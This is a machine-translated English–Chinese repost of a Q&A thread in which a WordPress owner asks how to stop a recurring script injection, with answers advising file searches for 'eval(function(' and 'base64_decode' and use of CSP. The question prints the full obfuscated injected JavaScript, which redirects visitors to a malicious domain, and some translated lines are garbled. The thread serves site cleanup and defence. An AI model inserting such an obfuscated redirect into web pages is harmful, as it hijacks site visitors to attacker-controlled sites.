[英]Javascript Injection prevention on Wordpress
My blog on wordpress gets the following malicious script injected: 我在wordpress上的博客注入了以下恶意脚本:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('3.5.4="6://%1%0%0%9%2%8%7%1%2/";',10,10,'78|6F|6D|window|href|location|http|63|2E|74'.split('|'),0,{}))
It navigates to: 它导航到:
http://oxxtm.com/
which redirects to: http://oxxtm.com/
重定向到:
http://www.html5website.com/
I have already disabled a few plugins, but it seems like the problem is somewhere else, for I'm using the following plugins and they seem to have a good reputation: 我已经禁用了一些插件,但似乎问题出在其他地方,因为我使用以下插件并且它们似乎有良好的声誉:
If I can't find the rootcause, would you recomend handling the "redirect" event to keep the site running? 如果我找不到rootcause,你会建议处理“重定向”事件以保持网站运行吗? If so how could I handle if there is a redirect pointing to http://oxxtm.com/
and abort it using javascript? 如果是这样,如果有重定向指向http://oxxtm.com/
并使用javascript中止它我怎么能处理?
I tried using the onunload
and onbeforeunload
events but it seems like the injected eval
, runs before the event manipulation is even registered. 我尝试使用onunload
和onbeforeunload
事件,但它似乎是注入的eval
,在事件操作甚至注册之前运行。
I can see that it gets injected on different PHP pages (sometimes only one sometimes more) in wordpress and I don't know if there is a common PHP file in which I could include a script to prevent the action of this malicious script. 我可以看到它在wordpress中被注入不同的PHP页面(有时只有一个),我不知道是否有一个常见的PHP文件,我可以在其中包含一个脚本来阻止这个恶意脚本的操作。
I already removed the malicious script several times, but it gets injected again & again. 我已经多次删除了恶意脚本,但它会一次又一次地被注入。 I need to treat the symptom while I search for the cause or the site will be out of service. 我在搜索原因时需要对症状进行处理,否则网站将无法使用。 However, I don't understand how the script is injected in the first place. 但是,我不明白脚本是如何注入的。
Search with in all your files the following content: eval(function()
在所有文件中搜索以下内容: eval(function()
It will show you every files that contains this code. 它将显示包含此代码的每个文件。
Otherwise, try to search this: base64_decode
否则,尝试搜索: base64_decode
This is a function that permit to decode a base64-encoded text, which is often used by malicious PHP files to inject some code that you can't detect by searching eval(
这是一个允许解码base64编码文本的函数,恶意PHP文件经常使用它来注入一些搜索eval(
无法检测到的代码eval(
If the problem persists, answer here and I'll try to help you. 如果问题仍然存在,请在此处回答,我会尽力帮助您。
Also, as additional feature to protect your client-side from XSS like that, i can suggest you to use CSP after cleaning your backend from injection. 另外,作为保护客户端免受XSS影响的附加功能,我建议您在清洗注射后端后使用CSP。 You can read more about it: https://developer.mozilla.org/en/docs/Web/Security/CSP It's not a silver-bullet, but nice to have it for protection of users. 您可以阅读更多相关信息: https : //developer.mozilla.org/en/docs/Web/Security/CSP这不是一个银弹,但很高兴能够保护用户。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.